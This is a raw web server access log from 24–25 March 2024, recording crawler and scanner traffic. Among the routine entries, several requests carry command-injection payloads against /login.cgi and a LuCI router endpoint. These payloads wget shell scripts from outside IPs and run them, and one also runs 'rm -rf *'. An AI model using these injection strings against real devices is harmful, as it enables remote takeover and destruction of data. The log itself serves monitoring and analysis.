(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.104.11.46 - - [24/Mar/2024:18:53:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 101.44.249.209 - - [24/Mar/2024:18:54:37 +0100] "GET /index.php?sid=e90c3c271f3ec3c30474b3067feaed50 HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=e90c3c271f3ec3c30474b3067feaed50" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 172.104.11.34 - - [24/Mar/2024:18:56:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 45.79.181.104 - - [24/Mar/2024:19:15:36 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 47.128.48.182 - - [24/Mar/2024:19:17:37 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 45.77.253.75 - - [24/Mar/2024:19:19:06 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.4878.1658 Mobile Safari/537.36" 87.121.69.52 - - [24/Mar/2024:19:43:39 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 185.122.204.179 - - [24/Mar/2024:20:05:41 +0100] "\x03" 400 383 "-" "-" 159.8.248.21 - - [24/Mar/2024:20:48:04 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you" 80.94.92.60 - - [24/Mar/2024:21:09:49 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" 45.133.193.93 - - [24/Mar/2024:21:19:33 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.19.24.28 - - [24/Mar/2024:21:29:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 117.242.107.84 - - [24/Mar/2024:21:32:50 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 107.170.237.74 - - [24/Mar/2024:22:10:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 146.19.24.28 - - [24/Mar/2024:22:18:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 80.94.92.60 - - [24/Mar/2024:22:38:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 205.210.31.55 - - [24/Mar/2024:22:41:49 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 185.122.204.179 - - [24/Mar/2024:23:16:25 +0100] "\x03" 400 383 "-" "-" 185.227.184.54 - - [24/Mar/2024:23:18:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you" 209.250.246.201 - - [24/Mar/2024:23:23:39 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 188.75.140.78 - - [24/Mar/2024:23:30:24 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 78.153.47.184 - - [24/Mar/2024:23:47:28 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you" 170.64.147.228 - - [24/Mar/2024:23:51:25 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 162.216.149.120 - - [24/Mar/2024:23:58:11 +0100] "GET /client/get_targets HTTP/1.1" 404 363 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.79.128.205 - - [25/Mar/2024:00:00:22 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 45.79.128.205 - - [25/Mar/2024:00:00:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 162.216.150.7 - - [25/Mar/2024:00:13:35 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"